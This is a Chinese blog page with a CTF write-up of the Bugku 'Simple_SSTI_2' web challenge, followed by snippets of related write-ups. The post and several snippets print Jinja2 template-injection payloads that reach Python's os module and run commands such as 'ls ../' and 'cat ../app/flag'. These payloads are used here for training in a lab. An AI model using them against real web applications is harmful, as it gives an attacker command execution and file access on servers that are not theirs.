Bugku web Simple_SSTI_2 wp

最新推荐文章于 2024-07-27 23:24:44 发布
最新推荐文章于 2024-07-27 23:24:44 发布
阅读量658 收藏 1
点赞数 1
分类专栏: CTF-WP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Whaocai/article/details/119381243
版权

考点:
①SSTI注入

最近学了学python ssti注入,找一道题练习练习。
进去之后,提示我们有个flag参数,同时再用御剑扫一下发现没有别的页面。
在这里插入图片描述结合题目,直接payload:?flag={ {1+1}},用的是flask模板 jinja2引擎
在这里插入图片描述常见的ssti构造payload思路是:
在这里插入图片描述

这道题比较简单,什么敏感关键词都没有过滤,由于我们不知道flag文件的路径,所以这道题的payload的思路是想办法调用os模板来执行任意代码。如果知道flag文件路径这时构造payload的思路是想办法调用file模块,当然也可以用os模块。可参考:SSTI注入漏洞利用
payload:flag={ {config.__class__.__init__.__globals__['os'].popen('ls').r

最低0.47元/天 解锁文章
是路酒呀
关注
专栏目录
BugKu CTF之 Simple_SSTI_2
weixin_42557264的博客
09-16 1945
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2
记录笔记
04-22 990
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2 二级标题
Simple_SSTI_2 wp
张麦麦
11-08 203
payload {{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__ ['popen']('cat flag').read()}}
Bugku WEB Simple_SSTI_2
lin的博客
04-12 1570
1. 打开后,题目提示存在模板注入 2. 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 根据URL转换表,%20 -> 空格 %27 -> ', 上面的URL对应字符串为: /?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read(
WEB Simple_SSTI_2
m0_57954651的博客
05-02 467
打开题目 似乎和第一题有相同之处 先来测试一下有没有类似注入的漏洞 回显正常 说明方向没错 再此构造 ?flag={{''.__class__.__mro__}}(借鉴大佬..) 用mro回显到了两类 str object 我们可利用第二的object来作突破 THEN 利用subclasses这个参数 __subclasses__属性会输出该类下所有的子类 ?flag={{''.__class__.__mro__[1].__subclasses__() }} 看到了里面的...
【愚公系列】2023年06月 Bugku-WebSimple_SSTI_2)
时光隧道
06-22 6106
Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。Flask提供了基本的Web开发所需的组件,如路由、请求和响应处理、会话管理、模板渲染等,同时还支持各种第三方扩展和插件,可以轻松地实现各种复杂的Web应用开发。Flask框架也因其灵活性和简易性而广受欢迎,被许多Web开发者用于构建Web应用和API。Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。
Simple_SSTI_2
天天学安全专属博客
03-03 1060
Simple_SSTI_2,backup靶场
BUGKU-WEB Simple_SSTI_2
天泽岁月
02-06 614
BUGKU-WEB Simple_SSTI_2
bugku-web-Simple_SSTI_2
最新发布
m0_52484587的博客
07-27 969
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。其影响范围主要取决于模版引擎的复杂性。此外,也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
BUGKU-simple_SSTI_1漏洞注入
kingx3的博客
10-08 346
SSTI全称Server side template injection.服务端模板注入这节课主要讲flask的模板注入.flask会把类似于 的变量当做参数来渲染并填充到web页面,如果该参数可控并被后台解析则有可能被注入恶意代码导致注入漏洞请注意 模板注入只会存在于二次渲染中,无二次渲染不会出现模板注入。
BugkuWebSimple_SSTI_2
Light_inthe_eyes的博客
11-04 265
题目提示就很明显了是模板注入 flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} flag={{config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }} flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read
Bugku Simple_SSTI_2
qq_52718293的博客
10-23 2617
首先打开之后是上面这样,题目有提示是ssti,所以
BugkuSimple_SSTI_2
热门推荐
qq_46230755的博客
03-10 1万+
我超喜欢这种题目的,确实对我这种萌新非常的友好 打开后,题目提示存在模板注入 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进行一个个进入查看,运气很好,第一个看的app文件夹里就有flag ?flag={{%20config.__class__.__init__.__globals__[%27os%27].po
[bugku]Simple_SSTI_2
ZhShy
03-10 3453
进入页面之后F12没发现什么有用的东西。 照例看看config: http://114.67.175.224:12482/?flag={{config}} 没有flag 试一试 http://114.67.175.224:12482/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} __class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。 __i
BUGKU-WEB Simple_SSTI_1
天泽岁月
02-04 2353
BUGKU 第02题
XCTF shrine wp
Lakers248_的博客
05-12 285
XCTF shrine wp
bugkuctf-Simple_SSTI_2
qq_51775369的博客
03-10 5491
bugku-ctf
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值